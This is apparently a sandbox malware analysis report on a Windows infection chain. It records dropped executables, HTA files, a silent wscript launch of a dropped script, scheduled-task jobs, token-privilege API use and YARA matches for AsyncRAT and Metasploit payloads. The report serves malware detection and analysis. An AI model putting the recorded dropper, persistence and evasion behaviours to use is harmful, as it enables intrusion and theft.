Source: afccf6841f.exe, 00000008.00000002.2268922496.0000000000FD2000.00000002.00000001.01000000.0000000C.sdmp	String found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer	memstr_c513f5b7-5
Source: afccf6841f.exe, 0000002F.00000002.2455123932.0000000000FD2000.00000002.00000001.01000000.0000000C.sdmp	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_3bab46f3-5
Source: afccf6841f.exe, 0000002F.00000002.2455123932.0000000000FD2000.00000002.00000001.01000000.0000000C.sdmp	String found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer	memstr_1c8ae419-0

Creates HTA files

Source: C:\Users\user\AppData\Local\Temp\1075489001\afccf6841f.exe	File created: C:\Users\user\AppData\Local\Temp\2C3I1mD9d.hta	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File created: C:\Temp\v468GkyBl.hta
Source: C:\Users\user\AppData\Local\Temp\1075489001\afccf6841f.exe	File created: C:\Users\user\AppData\Local\Temp\wucgjnAiS.hta
Source: C:\Windows\System32\cmd.exe	File created: C:\Temp\i2GY6vn5L.hta

PE file contains section with special chars

Source: DhqvS8pXj8.exe	Static PE information: section name:
Source: DhqvS8pXj8.exe	Static PE information: section name: .idata
Source: DhqvS8pXj8.exe	Static PE information: section name:
Source: skotes.exe.0.dr	Static PE information: section name:
Source: skotes.exe.0.dr	Static PE information: section name: .idata
Source: skotes.exe.0.dr	Static PE information: section name:
Source: random[2].exe1.6.dr	Static PE information: section name:
Source: random[2].exe1.6.dr	Static PE information: section name: .idata
Source: random[2].exe1.6.dr	Static PE information: section name:
Source: d895046020.exe.6.dr	Static PE information: section name:
Source: d895046020.exe.6.dr	Static PE information: section name: .idata
Source: d895046020.exe.6.dr	Static PE information: section name:

Powershell drops PE file

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Local\TempMHLZAGA5NZFMG2ZDILNZW0CTFV5YR4HM.EXE	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Local\TempOBIIERT8JWKOKQBWJVVZGBZ2TJW54YEP.EXE	Jump to dropped file

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Source: C:\Windows\System32\wscript.exe

COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}

Wscript called in batch mode (surpress errors)

Source: unknown

Process created: C:\Windows\System32\wscript.exe C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\GuardTech Solutions\AchillesGuard.js"

Contains functionality to communicate with device drivers

Source: C:\Users\user\AppData\Local\Temp\1075489001\afccf6841f.exe

Code function: 8_2_00F7D5EB: CreateFileW,DeviceIoControl,CloseHandle,

8_2_00F7D5EB

Contains functionality to launch a process as a different user

Source: C:\Users\user\AppData\Local\Temp\1075489001\afccf6841f.exe

Code function: 8_2_00F71201 LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,

8_2_00F71201

Contains functionality to shutdown / reboot the system

Source: C:\Users\user\AppData\Local\Temp\1075489001\afccf6841f.exe	Code function: 8_2_00F7E8F6 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,		8_2_00F7E8F6
Source: C:\Users\user\AppData\Local\Temp\1075509001\dc785309cb.exe	Code function: 30_2_004038AF EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,DeleteFileW,CoUninitialize,ExitProcess,lstrcatW,lstrcmpiW,CreateDirectoryW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,InitOnceBeginInitialize,ExitWindowsEx,		30_2_004038AF

Creates files inside the system directory

Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	File created: C:\Windows\Tasks\skotes.job	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1075509001\dc785309cb.exe	File created: C:\Windows\SchedulesAb
Source: C:\Users\user\AppData\Local\Temp\1075509001\dc785309cb.exe	File created: C:\Windows\ContainsBefore
Source: C:\Users\user\AppData\Local\Temp\1075509001\dc785309cb.exe	File created: C:\Windows\TokenDetroit
Source: C:\Users\user\AppData\Local\Temp\1075509001\dc785309cb.exe	File created: C:\Windows\AttacksContacted
Source: C:\Users\user\AppData\Local\Temp\1075350001\k6Sly2p.exe	File created: C:\Windows\Tasks\Test Task17.job

Detected potential crypto function

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 6_2_008EE530	6_2_008EE530
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 6_2_009278BB	6_2_009278BB
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 6_2_00927049	6_2_00927049
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 6_2_00928860	6_2_00928860
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 6_2_009231A8	6_2_009231A8
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 6_2_008E4DE0	6_2_008E4DE0
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 6_2_00922D10	6_2_00922D10
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 6_2_0092779B	6_2_0092779B
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 6_2_00917F36	6_2_00917F36
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 6_2_008E4B30	6_2_008E4B30
Source: C:\Users\user\AppData\Local\Temp\1075350001\k6Sly2p.exe	Code function: 7_2_027BD1A8	7_2_027BD1A8
Source: C:\Users\user\AppData\Local\Temp\1075350001\k6Sly2p.exe	Code function: 7_2_049354FE	7_2_049354FE
Source: C:\Users\user\AppData\Local\Temp\1075350001\k6Sly2p.exe	Code function: 7_2_04933410	7_2_04933410
Source: C:\Users\user\AppData\Local\Temp\1075350001\k6Sly2p.exe	Code function: 7_2_0493CCC8	7_2_0493CCC8
Source: C:\Users\user\AppData\Local\Temp\1075350001\k6Sly2p.exe	Code function: 7_2_0493AF28	7_2_0493AF28
Source: C:\Users\user\AppData\Local\Temp\1075350001\k6Sly2p.exe	Code function: 7_2_049331C4	7_2_049331C4
Source: C:\Users\user\AppData\Local\Temp\1075350001\k6Sly2p.exe	Code function: 7_2_049343D8	7_2_049343D8
Source: C:\Users\user\AppData\Local\Temp\1075350001\k6Sly2p.exe	Code function: 7_2_049343C8	7_2_049343C8
Source: C:\Users\user\AppData\Local\Temp\1075350001\k6Sly2p.exe	Code function: 7_2_0493CCB8	7_2_0493CCB8
Source: C:\Users\user\AppData\Local\Temp\1075350001\k6Sly2p.exe	Code function: 7_2_0493AF18	7_2_0493AF18
Source: C:\Users\user\AppData\Local\Temp\1075350001\k6Sly2p.exe	Code function: 7_2_04939A2E	7_2_04939A2E
Source: C:\Users\user\AppData\Local\Temp\1075350001\k6Sly2p.exe	Code function: 7_2_0493DA60	7_2_0493DA60
Source: C:\Users\user\AppData\Local\Temp\1075350001\k6Sly2p.exe	Code function: 7_2_0493DA68	7_2_0493DA68
Source: C:\Users\user\AppData\Local\Temp\1075350001\k6Sly2p.exe	Code function: 7_2_04993A08	7_2_04993A08
Source: C:\Users\user\AppData\Local\Temp\1075350001\k6Sly2p.exe	Code function: 7_2_049903D8	7_2_049903D8
Source: C:\Users\user\AppData\Local\Temp\1075350001\k6Sly2p.exe	Code function: 7_2_049915E0	7_2_049915E0
Source: C:\Users\user\AppData\Local\Temp\1075350001\k6Sly2p.exe	Code function: 7_2_049906FF	7_2_049906FF
Source: C:\Users\user\AppData\Local\Temp\1075350001\k6Sly2p.exe	Code function: 7_2_0609F818	7_2_0609F818
Source: C:\Users\user\AppData\Local\Temp\1075350001\k6Sly2p.exe	Code function: 7_2_0609F540	7_2_0609F540
Source: C:\Users\user\AppData\Local\Temp\1075350001\k6Sly2p.exe	Code function: 7_2_0609E500	7_2_0609E500
Source: C:\Users\user\AppData\Local\Temp\1075489001\afccf6841f.exe	Code function: 8_2_00F18060	8_2_00F18060
Source: C:\Users\user\AppData\Local\Temp\1075489001\afccf6841f.exe	Code function: 8_2_00F82046	8_2_00F82046
Source: C:\Users\user\AppData\Local\Temp\1075489001\afccf6841f.exe	Code function: 8_2_00F78298	8_2_00F78298
Source: C:\Users\user\AppData\Local\Temp\1075489001\afccf6841f.exe	Code function: 8_2_00F4E4FF	8_2_00F4E4FF
Source: C:\Users\user\AppData\Local\Temp\1075489001\afccf6841f.exe	Code function: 8_2_00F4676B	8_2_00F4676B
Source: C:\Users\user\AppData\Local\Temp\1075489001\afccf6841f.exe	Code function: 8_2_00FA4873	8_2_00FA4873
Source: C:\Users\user\AppData\Local\Temp\1075489001\afccf6841f.exe	Code function: 8_2_00F1CAF0	8_2_00F1CAF0
Source: C:\Users\user\AppData\Local\Temp\1075489001\afccf6841f.exe	Code function: 8_2_00F3CAA0	8_2_00F3CAA0
Source: C:\Users\user\AppData\Local\Temp\1075489001\afccf6841f.exe	Code function: 8_2_00F2CC39	8_2_00F2CC39
Source: C:\Users\user\AppData\Local\Temp\1075489001\afccf6841f.exe	Code function: 8_2_00F46DD9	8_2_00F46DD9
Source: C:\Users\user\AppData\Local\Temp\1075489001\afccf6841f.exe	Code function: 8_2_00F191C0	8_2_00F191C0
Source: C:\Users\user\AppData\Local\Temp\1075489001\afccf6841f.exe	Code function: 8_2_00F2B119	8_2_00F2B119
Source: C:\Users\user\AppData\Local\Temp\1075489001\afccf6841f.exe	Code function: 8_2_00F31394	8_2_00F31394
Source: C:\Users\user\AppData\Local\Temp\1075489001\afccf6841f.exe	Code function: 8_2_00F31706	8_2_00F31706
Source: C:\Users\user\AppData\Local\Temp\1075489001\afccf6841f.exe	Code function: 8_2_00F3781B	8_2_00F3781B
Source: C:\Users\user\AppData\Local\Temp\1075489001\afccf6841f.exe	Code function: 8_2_00F319B0	8_2_00F319B0
Source: C:\Users\user\AppData\Local\Temp\1075489001\afccf6841f.exe	Code function: 8_2_00F2997D	8_2_00F2997D
Source: C:\Users\user\AppData\Local\Temp\1075489001\afccf6841f.exe	Code function: 8_2_00F17920	8_2_00F17920
Source: C:\Users\user\AppData\Local\Temp\1075489001\afccf6841f.exe	Code function: 8_2_00F37A4A	8_2_00F37A4A
Source: C:\Users\user\AppData\Local\Temp\1075489001\afccf6841f.exe	Code function: 8_2_00F37CA7	8_2_00F37CA7
Source: C:\Users\user\AppData\Local\Temp\1075489001\afccf6841f.exe	Code function: 8_2_00F31C77	8_2_00F31C77
Source: C:\Users\user\AppData\Local\Temp\1075489001\afccf6841f.exe	Code function: 8_2_00F49EEE	8_2_00F49EEE
Source: C:\Users\user\AppData\Local\Temp\1075489001\afccf6841f.exe	Code function: 8_2_00F9BE44	8_2_00F9BE44
Source: C:\Users\user\AppData\Local\Temp\1075489001\afccf6841f.exe	Code function: 8_2_00F31F32	8_2_00F31F32
Source: C:\Users\user\AppData\Local\Temp\1075509001\dc785309cb.exe	Code function: 30_2_0040737E	30_2_0040737E
Source: C:\Users\user\AppData\Local\Temp\1075509001\dc785309cb.exe	Code function: 30_2_00406EFE	30_2_00406EFE
Source: C:\Users\user\AppData\Local\Temp\1075509001\dc785309cb.exe	Code function: 30_2_004079A2	30_2_004079A2
Source: C:\Users\user\AppData\Local\Temp\1075509001\dc785309cb.exe	Code function: 30_2_004049A8	30_2_004049A8

Dropped file seen in connection with other malware

Source: Joe Sandbox View

Dropped File: C:\Users\user\AppData\Local\GuardTech Solutions\AchillesGuard.com 1300262A9D6BB6FCBEFC0D299CCE194435790E70B9C7B4A651E202E90A32FD49

Found potential string decryption / allocating functions

Source: C:\Users\user\AppData\Local\Temp\1075509001\dc785309cb.exe	Code function: String function: 004062CF appears 58 times
Source: C:\Users\user\AppData\Local\Temp\1075489001\afccf6841f.exe	Code function: String function: 00F30A30 appears 46 times
Source: C:\Users\user\AppData\Local\Temp\1075489001\afccf6841f.exe	Code function: String function: 00F2F9F2 appears 31 times

Searches for the Microsoft Outlook file path

Source: C:\Windows\SysWOW64\mshta.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
Source: C:\Windows\SysWOW64\mshta.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
Source: C:\Windows\System32\mshta.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
Source: C:\Windows\SysWOW64\mshta.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
Source: C:\Windows\System32\mshta.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE

Uses 32bit PE files

Source: DhqvS8pXj8.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Yara signature match

Source: 57.2.Macromedia.com.40c24a8.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
Source: 57.2.Macromedia.com.40c24a8.2.raw.unpack, type: UNPACKEDPE	Matched rule: rat_win_asyncrat author = Sekoia.io, description = Detect AsyncRAT based on specific strings, creation_date = 2023-01-25, classification = TLP:CLEAR, version = 1.0, id = d698e4a1-77ff-4cd7-acb3-27fb16168ceb
Source: 57.2.Macromedia.com.40c24a8.2.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
Source: 57.2.Macromedia.com.40c24a8.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
Source: 57.2.Macromedia.com.40c24a8.2.unpack, type: UNPACKEDPE	Matched rule: rat_win_asyncrat author = Sekoia.io, description = Detect AsyncRAT based on specific strings, creation_date = 2023-01-25, classification = TLP:CLEAR, version = 1.0, id = d698e4a1-77ff-4cd7-acb3-27fb16168ceb
Source: 57.2.Macromedia.com.40c24a8.2.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
Source: 57.2.Macromedia.com.198a050.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
Source: 57.2.Macromedia.com.198a050.1.raw.unpack, type: UNPACKEDPE	Matched rule: rat_win_asyncrat author = Sekoia.io, description = Detect AsyncRAT based on specific strings, creation_date = 2023-01-25, classification = TLP:CLEAR, version = 1.0, id = d698e4a1-77ff-4cd7-acb3-27fb16168ceb
Source: 57.2.Macromedia.com.198a050.1.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
Source: 57.2.Macromedia.com.198a050.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
Source: 57.2.Macromedia.com.198a050.1.unpack, type: UNPACKEDPE	Matched rule: rat_win_asyncrat author = Sekoia.io, description = Detect AsyncRAT based on specific strings, creation_date = 2023-01-25, classification = TLP:CLEAR, version = 1.0, id = d698e4a1-77ff-4cd7-acb3-27fb16168ceb
Source: 57.2.Macromedia.com.198a050.1.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
Source: 00000039.00000002.2988583690.000000000197A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
Source: 00000039.00000002.2988583690.000000000197A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
Source: 00000039.00000002.2989177292.00000000040B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
Source: 00000039.00000002.2989177292.00000000040B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
Source: 00000039.00000002.2989177292.00000000040C2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
Source: 00000039.00000002.2989177292.00000000040C2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
Source: 0000003F.00000002.2927763179.000000000A17E000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Msfpayloads_msf_9 date = 2017-02-09, hash1 = e408678042642a5d341e8042f476ee7cef253871ef1c9e289acf0ee9591d1e81, author = Florian Roth, description = Metasploit Payloads - file msf.war - contents, reference = Internal Research

Source: DhqvS8pXj8.exe	Static PE information: Section: fsnlaalu ZLIB complexity 0.9941688544489612
Source: skotes.exe.0.dr	Static PE information: Section: fsnlaalu ZLIB complexity 0.9941688544489612
Source: random[2].exe.6.dr	Static PE information: Section: .rdata ZLIB complexity 1.0003345630787037
Source: 1e8dfbd5c2.exe.6.dr	Static PE information: Section: .rdata ZLIB complexity 1.0003345630787037
Source: random[1].exe.6.dr	Static PE information: Section: .rdata ZLIB complexity 1.0003335336538461
Source: random[1].exe.6.dr	Static PE information: Section: .rdata ZLIB complexity 1.0003335336538461
Source: 5d2afc26b8.exe.6.dr	Static PE information: Section: .rdata ZLIB complexity 1.0003335336538461
Source: 5d2afc26b8.exe.6.dr	Static PE information: Section: .rdata ZLIB complexity 1.0003335336538461
Source: random[2].exe1.6.dr	Static PE information: Section: ZLIB complexity 0.996481948757764
Source: random[2].exe1.6.dr	Static PE information: Section: voasjcay ZLIB complexity 0.9943484166047548
Source: d895046020.exe.6.dr	Static PE information: Section: ZLIB complexity 0.996481948757764
Source: d895046020.exe.6.dr	Static PE information: Section: voasjcay ZLIB complexity 0.9943484166047548
Source: random[1].exe1.6.dr	Static PE information: Section: .reloc ZLIB complexity 1.002685546875
Source: dc785309cb.exe.6.dr	Static PE information: Section: .reloc ZLIB complexity 1.002685546875

Source: random[2].exe.6.dr, gBMthepoZSL1ZVKpeA.cs	Cryptographic APIs: 'CreateDecryptor'
Source: random[2].exe.6.dr, gBMthepoZSL1ZVKpeA.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 1e8dfbd5c2.exe.6.dr, gBMthepoZSL1ZVKpeA.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 1e8dfbd5c2.exe.6.dr, gBMthepoZSL1ZVKpeA.cs	Cryptographic APIs: 'CreateDecryptor'
Source: random[1].exe.6.dr, PjMboxrZKVMRiayL4T.cs	Cryptographic APIs: 'CreateDecryptor'
Source: random[1].exe.6.dr, PjMboxrZKVMRiayL4T.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 5d2afc26b8.exe.6.dr, PjMboxrZKVMRiayL4T.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 5d2afc26b8.exe.6.dr, PjMboxrZKVMRiayL4T.cs	Cryptographic APIs: 'CreateDecryptor'
Source: k6Sly2p.exe.6.dr, -.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: k6Sly2p.exe.6.dr, -.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: k6Sly2p.exe.6.dr, -.cs	Cryptographic APIs: 'CreateDecryptor'

Source: random[2].exe.6.dr, Program.cs	Base64 encoded string: 'YTVlY2ZkN2RjODQzZTM5ZTA4ZmE4MWExMzQ2NTFkNjVhNjI2MDEwNDc0ZTJmNzQ3YzUxMDg3MWJjMTc1N2QyMg=='
Source: 1e8dfbd5c2.exe.6.dr, Program.cs	Base64 encoded string: 'YTVlY2ZkN2RjODQzZTM5ZTA4ZmE4MWExMzQ2NTFkNjVhNjI2MDEwNDc0ZTJmNzQ3YzUxMDg3MWJjMTc1N2QyMg=='
Source: random[1].exe.6.dr, Program.cs	Base64 encoded string: 'YTVlY2ZkN2RjODQzZTM5ZTA4ZmE4MWExMzQ2NTFkNjVhNjI2MDEwNDc0ZTJmNzQ3YzUxMDg3MWJjMTc1N2QyMg=='
Source: 5d2afc26b8.exe.6.dr, Program.cs	Base64 encoded string: 'YTVlY2ZkN2RjODQzZTM5ZTA4ZmE4MWExMzQ2NTFkNjVhNjI2MDEwNDc0ZTJmNzQ3YzUxMDg3MWJjMTc1N2QyMg=='

Source: classification engine

Classification label: mal100.phis.troj.spyw.evad.winEXE@141/86@2/3

Source: C:\Users\user\AppData\Local\Temp\1075489001\afccf6841f.exe

Code function: 8_2_00F837B5 GetLastError,FormatMessageW,

8_2_00F837B5

Source: C:\Users\user\AppData\Local\Temp\1075489001\afccf6841f.exe	Code function: 8_2_00F710BF AdjustTokenPrivileges,CloseHandle,		8_2_00F710BF
Source: C:\Users\user\AppData\Local\Temp\1075489001\afccf6841f.exe	Code function: 8_2_00F716C3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,		8_2_00F716C3

Source: C:\Users\user\AppData\Local\Temp\1075489001\afccf6841f.exe

Code function: 8_2_00F851CD SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,

8_2_00F851CD

Source: C:\Users\user\AppData\Local\Temp\1075489001\afccf6841f.exe

Code function: 8_2_00F9A67C CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,

8_2_00F9A67C

Source: C:\Users\user\AppData\Local\Temp\1075489001\afccf6841f.exe

